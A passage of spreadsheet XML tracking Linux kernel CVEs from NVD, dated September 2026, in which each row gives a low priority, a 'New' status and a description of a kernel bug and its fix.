ppp_sync_txmunge() checks headroom before prepending the address and
control bytes, but does not ensure that the skb header is writable.
A received skb can reach this function through PPP channel bridging
without passing through ppp_start_xmit(), which calls skb_cow_head().
For example, a PPPoE frame may share its buffer with a clone queued to
an AF_PACKET socket. If it is bridged to a synchronous tty channel, the
address/control bytes can overwrite data still visible to that socket.
Use skb_cow_head() to ensure both sufficient headroom and a writable
header.</t>
        </is>
      </c>
      <c r="T605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97964</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97965</t>
        </is>
      </c>
      <c r="D606" s="5" t="inlineStr"/>
      <c r="E606" s="5" t="inlineStr"/>
      <c r="F606" s="5" t="inlineStr"/>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="inlineStr"/>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K606" s="5" t="inlineStr"/>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q606" s="5" t="inlineStr"/>
      <c r="R606" s="5" t="inlineStr"/>
      <c r="S606" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: initialize _md in vxlan_xmit_one()
If a VXLAN device is configured with both VXLAN_F_COLLECT_METADATA and
VXLAN_F_GBP, and a packet is transmitted through it using an external
ip_tunnel_info that lacks the IP_TUNNEL_VXLAN_OPT_BIT flag, md is left
pointing to the uninitialized _md stack variable:
                if (test_bit(IP_TUNNEL_VXLAN_OPT_BIT, info-&gt;key.tun_flags)) {
                        if (info-&gt;options_len &lt; sizeof(*md))
                                goto drop;
                        md = ip_tunnel_info_opts(info);
                }
Because IP_TUNNEL_VXLAN_OPT_BIT is not set, md is not updated and remains
pointing to _md. Later, vxlan_build_skb() is called with md, which
eventually calls vxlan_build_gbp_hdr():
        if (vxflags &amp; VXLAN_F_GBP)
                vxlan_build_gbp_hdr(vxh, md);
Inside vxlan_build_gbp_hdr(), md-&gt;gbp is read:
        if (!md-&gt;gbp)
                return;
        gbp = (struct vxlanhdr_gbp *)vxh;
        ...
        if (md-&gt;gbp &amp; VXLAN_GBP_DONT_LEARN)
                gbp-&gt;dont_learn = 1;
If the stack contains garbage, this causes:
1) VXLAN_HF_GBP flag to be spuriously set in the VXLAN header.
2) gbp-&gt;dont_learn and gbp-&gt;policy_applied to be set from stack bits.
3) gbp-&gt;policy_id to receive 16 bits of uninitialized kernel stack data,
   leaking it onto the wire.
Fix this by zero-initializing _md. If IP_TUNNEL_VXLAN_OPT_BIT is not
present, md-&gt;gbp remains 0, and vxlan_build_gbp_hdr() returns early
without modifying the VXLAN header.</t>
        </is>
      </c>
      <c r="T606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97965</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97966</t>
        </is>
      </c>
      <c r="D607" s="5" t="inlineStr"/>
      <c r="E607" s="5" t="inlineStr"/>
      <c r="F607" s="5" t="inlineStr"/>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="inlineStr"/>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr"/>
      <c r="L607" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q607" s="5" t="inlineStr"/>
      <c r="R607" s="5" t="inlineStr"/>
      <c r="S607" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-pf: reset HTB scheduler topology before freeing queues
HTB offload programs NIX_AF_TLxX_TOPOLOGY on QoS-allocated scheduler
queues via otx2_qos_txschq_set_parent_topology(), but teardown freed
those queues without clearing TOPOLOGY.  The AF only restores PARENT and
SCHEDULE on free, so PRIO_ANCHOR/RR_PRIO settings can survive in the
shared scheduler pool and affect later allocations.
Add otx2_qos_reset_schq_topology() and otx2_qos_free_hw_schq() to zero
TL4 through TL2 TOPOLOGY before each schq is returned to the AF during
hierarchy teardown and cfg rollback.  Skip the aggregation level (TL1):
it is a per-tx-link queue shared by the PF, default Tx hierarchy and VFs,
and is not freed back to the AF by nix_txschq_free_one().</t>
        </is>
      </c>
      <c r="T607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97966</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97967</t>
        </is>
      </c>
      <c r="D608" s="5" t="inlineStr"/>
      <c r="E608" s="5" t="inlineStr"/>
      <c r="F608" s="5" t="inlineStr"/>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="inlineStr"/>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q608" s="5" t="inlineStr"/>
      <c r="R608" s="5" t="inlineStr"/>
      <c r="S608" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (corsair-cpro) Remove debugfs entries when probe fails
ccp_debugfs_init() registers debugfs files whose private data is the devm
allocated ccp.  If hwmon_device_register_with_info() fails right after it,
ccp_probe() returns without removing them: the HID core then frees ccp,
and ccp_remove() is not called for a failed probe, so the files stay
behind.  Reading one of them dereferences the freed pointer.
Remove the debugfs entries on that error path.  debugfs_remove_recursive()
waits for readers already inside the show callbacks, so ccp is no longer
reachable through debugfs by the time probe returns.</t>
        </is>
      </c>
      <c r="T608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97967</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97968</t>
        </is>
      </c>
      <c r="D609" s="5" t="inlineStr"/>
      <c r="E609" s="5" t="inlineStr"/>
      <c r="F609" s="5" t="inlineStr"/>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="inlineStr"/>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr"/>
      <c r="L609" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q609" s="5" t="inlineStr"/>
      <c r="R609" s="5" t="inlineStr"/>
      <c r="S609" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (corsair-cpro) Create debugfs entries after hwmon registration
ccp_debugfs_init() registers debugfs files whose private data is the devm
allocated ccp.  It runs before hwmon_device_register_with_info(), so when
that registration fails, ccp_probe() returns with the files still in
place.  The HID core then frees ccp, and ccp_remove() is not called for a
failed probe, so nothing removes them later either.  Reading one of the
files dereferences the freed pointer.
Create the debugfs entries only after the hwmon device has been
registered, so no failing path can leave them behind.
The two version queries stay where they are.  They send USB commands
without holding ccp-&gt;mutex, which is only safe as long as nothing else
can call send_usb_cmd(); once the hwmon device is registered its
callbacks can do so concurrently.  Only the debugfs creation moves, and
it is told which queries succeeded.</t>
        </is>
      </c>
      <c r="T609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97968</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97969</t>
        </is>
      </c>
      <c r="D610" s="5" t="inlineStr"/>
      <c r="E610" s="5" t="inlineStr"/>
      <c r="F610" s="5" t="inlineStr"/>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="inlineStr"/>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr"/>
      <c r="L610" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q610" s="5" t="inlineStr"/>
      <c r="R610" s="5" t="inlineStr"/>
      <c r="S610" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
watchdog: msc313e: Fix clock leak and spurious timer in settimeout()
msc313e_wdt_settimeout() unconditionally calls msc313e_wdt_start() which
introduces two severe bugs:
1. If the watchdog is already active, calling start() again will
   increase the reference count of the clock again.  However stop() is
   only called once, the reference count is unbalance.
2. If the watchdog is stopped, calling settimeout() will start
   the hardware timer accidentally.
Factor out the register-writing logic into a helper function.  Only call
it in settimeout() if the watchdog is running.  Otherwise, simply update
`wdev-&gt;timeout`.</t>
        </is>
      </c>
      <c r="T610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97969</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97970</t>
        </is>
      </c>
      <c r="D611" s="5" t="inlineStr"/>
      <c r="E611" s="5" t="inlineStr"/>
      <c r="F611" s="5" t="inlineStr"/>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="inlineStr"/>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr"/>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q611" s="5" t="inlineStr"/>
      <c r="R611" s="5" t="inlineStr"/>
      <c r="S611" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
watchdog: msc313e: Avoid division by zero
clk_get_rate() could return 0.  Avoid a division by zero panic.</t>
        </is>
      </c>
      <c r="T611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97970</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97972</t>
        </is>
      </c>
      <c r="D612" s="5" t="inlineStr"/>
      <c r="E612" s="5" t="inlineStr"/>
      <c r="F612" s="5" t="inlineStr"/>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="inlineStr"/>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q612" s="5" t="inlineStr"/>
      <c r="R612" s="5" t="inlineStr"/>
      <c r="S612" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: macb: put the "mdio" child node reference on success
macb_mii_init() holds the reference returned by of_get_child_by_name()
for macb_mdiobus_register() and drops it only on the error paths, so
every successful probe leaks a node reference. On a CM5, overlay
removal after four bind cycles reports
  OF: ERROR: memory leak, expected refcount 1 instead of 5
Drop the reference after registration, where __mdiobus_register() has
already taken its own for the lifetime of the bus.</t>
        </is>
      </c>
      <c r="T612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97972</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97973</t>
        </is>
      </c>
      <c r="D613" s="5" t="inlineStr"/>
      <c r="E613" s="5" t="inlineStr"/>
      <c r="F613" s="5" t="inlineStr"/>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="inlineStr"/>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr"/>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q613" s="5" t="inlineStr"/>
      <c r="R613" s="5" t="inlineStr"/>
      <c r="S613" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: macb: destroy the phylink instance on the probe error path
macb_mii_init() creates a phylink instance on both of its success paths,
but the probe unwind frees the netdev without destroying it, so a failing
macb_alloc_tieoff() or register_netdev() leaks the instance.
Destroy it at err_out_unregister_mdio, which is only reachable once
macb_mii_init() has succeeded, so bp-&gt;phylink is valid there.</t>
        </is>
      </c>
      <c r="T613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97973</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97974</t>
        </is>
      </c>
      <c r="D614" s="5" t="inlineStr"/>
      <c r="E614" s="5" t="inlineStr"/>
      <c r="F614" s="5" t="inlineStr"/>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="inlineStr"/>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr">
        <is>
          <t>github, f5</t>
        </is>
      </c>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q614" s="5" t="inlineStr"/>
      <c r="R614" s="5" t="inlineStr"/>
      <c r="S614" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: null-check fib6_node before accessing in __ip6_del_rt_siblings()
syzbot reported a null-ptr-deref in __ip6_del_rt_siblings() [0].
The stack trace hinted towards a null dereference of rt-&gt;fib6_node when
fn-&gt;leaf is accessed in __ip6_del_rt_siblings(). With
RTNL_FLAG_DOIT_UNLOCKED set, inet6_rtm_delroute() operations run
concurrently without acquiring the RTNL lock. In ip6_route_del(), the
route lookup happens under rcu_read_lock() without acquiring
table-&gt;tb6_lock.
Between ip6_route_del() looking up the route and __ip6_del_rt_siblings()
acquiring table-&gt;tb6_lock, another thread can modify the routing table.
For example, when an ECMP route is replaced via RTM_NEWROUTE with
NLM_F_REPLACE, fib6_add_rt2node() unlinks all old siblings and sets
iter-&gt;fib6_node = NULL. A reproducer was found that triggers this [1].
Add a check to ensure rt-&gt;fib6_node is non-null before accessing it.
[0]
KASAN: null-ptr-deref in range [0x0000000000000020-0x0000000000000027]
RIP: 0010:__ip6_del_rt_siblings+0x31e/0x7c0 net/ipv6/route.c:4056
Call Trace:
 &lt;TASK&gt;
 ip6_route_del+0x1054/0x1110 net/ipv6/route.c:4232
 inet6_rtm_delroute+0x5d7/0x6d0 net/ipv6/route.c:5669
 rtnetlink_rcv_msg+0x802/0xc00 net/core/rtnetlink.c:7132
 netlink_rcv_skb+0x226/0x4a0 net/netlink/af_netlink.c:2556
 netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]
 netlink_unicast+0x7f5/0x990 net/netlink/af_netlink.c:1345
 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1900
 sock_sendmsg_nosec+0x13a/0x180 net/socket.c:800
 __sock_sendmsg net/socket.c:815 [inline]
 ____sys_sendmsg+0x565/0x870 net/socket.c:2713
 ___sys_sendmsg+0x2a5/0x360 net/socket.c:2767
 __sys_sendmsg net/socket.c:2799 [inline]
 __do_sys_sendmsg net/socket.c:2804 [inline]
 __se_sys_sendmsg net/socket.c:2802 [inline]
 __x64_sys_sendmsg+0x1b7/0x290 net/socket.c:2802
 do_syscall_x64 arch/x86/entry/syscall_64.c:61 [inline]
 do_syscall_64+0x166/0x520 arch/x86/entry/syscall_64.c:84
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
 &lt;/TASK&gt;
[1] https://gist.github.com/NamanGulati/0766a1159b6ca61928faaf87425ff899</t>
        </is>
      </c>
      <c r="T614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97974</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97975</t>
        </is>
      </c>
      <c r="D615" s="5" t="inlineStr"/>
      <c r="E615" s="5" t="inlineStr"/>
      <c r="F615" s="5" t="inlineStr"/>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="inlineStr"/>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K615" s="5" t="inlineStr"/>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q615" s="5" t="inlineStr"/>
      <c r="R615" s="5" t="inlineStr"/>
      <c r="S615" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_sysfs: Fix NULL pointer dereference in device_del()
A NULL pointer dereference in klist_put() occurs when a child device (such
as a BNEP network device in bnep_session) is concurrently being
unregistered while hci_conn_del_sysfs() reparents child devices.
This is caused by a race condition between hci_conn_del_sysfs() and
concurrent child device unregistration (e.g. bnep_session calling
unregister_netdev()). During device unregistration, device_del() snapshots
a non-NULL parent pointer. Concurrently, hci_conn_del_sysfs() finds the
child device using device_find_any_child() and calls device_move() to
reparent it to NULL, which removes the node from its parent's klist and
clears knode_parent. Subsequently, device_del() calls
klist_del(&amp;dev-&gt;p-&gt;knode_parent) using the stale parent snapshot, causing
klist_put() to dereference knode_klist(n)-&gt;put on an already removed node,
resulting in a NULL pointer dereference.
This race was introduced by commit 27aabf27fd01 ("Bluetooth: fix
use-after-free in device_for_each_child()"), which replaced
device_find_child(..., __match_tty) with device_find_any_child() in
hci_conn_del_sysfs(). That change was intended to avoid a use-after-free
where conn-&gt;dev outlived its parent hdev-&gt;dev when child devices held
references to conn-&gt;dev, because conn-&gt;dev only held a reference to
hdev-&gt;dev while registered in sysfs.
Fix the issue properly by taking an explicit reference to the parent device
with get_device(&amp;hdev-&gt;dev) in hci_conn_init_sysfs() and dropping it with
put_device(parent) in bt_link_release() when the conn device is freed. This
ensures that hdev-&gt;dev remains valid for the entire lifecycle of conn-&gt;dev,
resolving the underlying use-after-free. With the parent reference held
properly, restore the __match_tty filter in hci_conn_del_sysfs() so that
device_move() is only invoked on persistent RFCOMM TTY devices as
originally intended, eliminating the race condition with unregistering
network devices.</t>
        </is>
      </c>
      <c r="T615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97975</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97976</t>
        </is>
      </c>
      <c r="D616" s="5" t="inlineStr"/>
      <c r="E616" s="5" t="inlineStr"/>
      <c r="F616" s="5" t="inlineStr"/>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="inlineStr"/>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q616" s="5" t="inlineStr"/>
      <c r="R616" s="5" t="inlineStr"/>
      <c r="S616" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btintel_pcie: validate packet_len before skb_put_data
btintel_pcie_submit_rx_work() reads packet_len from rfh_hdr without
checking if it exceeds the RX buffer size. An oversized packet_len
can lead to an out-of-bounds read in skb_put_data().
Validate packet_len to ensure it is non-zero and does not exceed
BTINTEL_PCIE_BUFFER_SIZE - sizeof(*rfh_hdr), logging an error when
invalid.
This issue was reported by Claude Mythos. It can be simulated either by
using customized firmware configured to return an invalid packet_len or
by modifying rfh_hdr-&gt;packet_len in the driver before calling
btintel_pcie_submit_rx_work().</t>
        </is>
      </c>
      <c r="T616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97976</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97977</t>
        </is>
      </c>
      <c r="D617" s="5" t="inlineStr"/>
      <c r="E617" s="5" t="inlineStr"/>
      <c r="F617" s="5" t="inlineStr"/>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="inlineStr"/>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr"/>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q617" s="5" t="inlineStr"/>
      <c r="R617" s="5" t="inlineStr"/>
      <c r="S617" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btusb: Fix UAF of btusb_data by rx_work
btusb_close() and btusb_flush() cancel data-&gt;rx_work with the
asynchronous cancel_delayed_work(), so if btusb_rx_work() is already
running on another CPU it keeps running after the cancel returns.
btusb_disconnect() calls hci_unregister_dev(), which invokes
btusb_close(), and then frees the btusb_data. A still running
btusb_rx_work() then dereferences the freed data:
	while ((skb = skb_dequeue(&amp;data-&gt;acl_q)))
		data-&gt;recv_acl(data-&gt;hdev, skb);
Use cancel_delayed_work_sync() instead. In btusb_close() the cancel also
has to happen after btusb_stop_traffic(), otherwise an URB completion
racing with the cancel can requeue the work right after it has been
waited for.</t>
        </is>
      </c>
      <c r="T617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97977</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97978</t>
        </is>
      </c>
      <c r="D618" s="5" t="inlineStr"/>
      <c r="E618" s="5" t="inlineStr"/>
      <c r="F618" s="5" t="inlineStr"/>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="inlineStr"/>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q618" s="5" t="inlineStr"/>
      <c r="R618" s="5" t="inlineStr"/>
      <c r="S618" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
eth: ice: don't dereference pointers from TP_printk()
After forwarding net-next during the v7.3 merge window we started
seeing:
  TRACE EVENT ERROR: Event ice_tx_dim_work has double dereference in TP_printk: REC-&gt;q_vector-&gt;tx.tx_ring-&gt;q_index
  WARNING: kernel/trace/trace_events.c:420 at test_double_dereference.cold+0x39/0x4b
this is due to extra checks added in tracing subsystem in
commit b5cc230af5e5 ("tracing: Warn when an event dereferences a pointer in TP_printk()").
Printing happens long after the event was recorded, by which point
the pointers may be invalid (the ring or the dim instance).
Copy the eight scalars into the event instead.</t>
        </is>
      </c>
      <c r="T618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97978</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
